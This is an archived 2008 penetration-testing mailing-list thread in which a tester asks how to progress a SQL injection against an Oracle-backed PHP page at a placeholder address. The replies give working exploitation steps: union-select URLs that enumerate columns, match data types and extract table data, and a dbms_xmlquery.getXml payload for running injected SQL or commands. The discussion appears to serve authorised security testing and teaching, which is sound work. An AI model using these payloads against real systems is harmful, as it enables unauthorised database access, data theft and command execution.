Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Pen-Test
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: Oracle URL SQL Injection issue

from [Cesar] Network Security [Permanent Link]
Subject: Re: Oracle URL SQL Injection issue
Date: Wed, 23 Jan 2008 15:37:01 -0800 (PST) 
Hi

I would recommend first trying to get the source code
if possible : http://x.y.z.a/dbs.inc but I guess it
won't work it should be a secure web server :)

Anyways depending on the Oracle version you can easily
own it, you just need to inject a function and exploit
some known sql injection in Oracle or depending on
permissions you can just run any commands.

http://x.y.z.a/item.php?Id=length(dbms_xmlquery.getXml('your
favority sql injection exploit here or any command'))

Look at : 
http://www.argeniss.com/research/HackingDatabases.zip
http://www.argeniss.com/research/OracleSQLInjBHUSA05.zip


Cesar.
--- Clone <c70n3@yahoo.co.in> wrote:


Thanks Jeff & everyone.

I've moved further after your emails. Really much
appreciated.

With Jeff's input below I enumerate that there are 2
columns. 

This time I gave



http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr


Now I get following error:

ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-01790: expression must have same datatype as
corresponding expression in dbs.inc on line 44

The I tried following:



http://x.y.z.a/item.php?Id=90%20union%20select%201,'a'%20from%20usr




http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr


And get the error

ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-00911: invalid character in dbs.inc on line 44

The functionality of the page is to generate an
email
page/forum email page.

Any idea what's next?



--- jeffrey rivero <jeffr76@yahoo.com> wrote:


Hello all
in your Union start by finding out how many

columns

there are
ie.




http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,1,1%20from%20usr;--

would give you 3 columns




http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,2,3,4%20from%20usr;--

would give you 4
then once you have that
get the data types




http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20'a',1,1,1%20from%20usr;--

for the first to be a string
and so on
then you can start to get real data from the

tables

or




http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20col1name,col2name,1,'a'%20from%20usr;--


Jeff

Clone wrote:

Hey List

I am pen testing a web app that supplies sql
parameters on the URL something like

http://x.y.z.a/item.php?Id=90

I did blind sql injection by adding AND 1=1 to

confirm

the vulnerability.

Now when I do

http://x.y.z.a/item.php?Id=90'

I get 

ociparse() [function.ociparse]: OCIParse:

ORA-01756:

quoted string not properly terminated in

item.php

on

line 312

Then I tried (after confirming presence of usr

table

name)







http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--


and I get the error

ociexecute() [function.ociexecute]:

OCIStmtExecute:

ORA-01789: query block has incorrect number of

result

columns in dbs.inc on line 44

I know one valid user account in the oracle DB.

Any idea what's the best strategy to move

forward?


I'm not getting any further from here so far.

Any advise / helpo would be much appreciated.

Cheers'



      5, 50, 500, 5000 - Store N number of mails

in your inbox. Go to




http://help.yahoo.com/l/in/yahoo/mail/yahoomail/tools/tools-08.html









------------------------------------------------------------------------

This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution

FREE today!


http://www.cenzic.com/downloads






------------------------------------------------------------------------










      Chat on a cool, new interface. No download
required. Go to
http://in.messenger.yahoo.com/webmessengerpromo.php




------------------------------------------------------------------------

This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE
today!

http://www.cenzic.com/downloads


------------------------------------------------------------------------







      
____________________________________________________________________________________
Never miss a thing.  Make Yahoo your home page. 
http://www.yahoo.com/r/hs

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: Promiscuous mode doesn't work on Intel 3945 wireless, Antispam
Next by Date:  RE: Spidering, merigoth
Previous by Thread:  Re: Oracle URL SQL Injection issue, Clone
Next by Thread:  Re: Oracle URL SQL Injection issue, Jason Thompson
Indexes:  [Date] [Thread] [Top] [All Lists]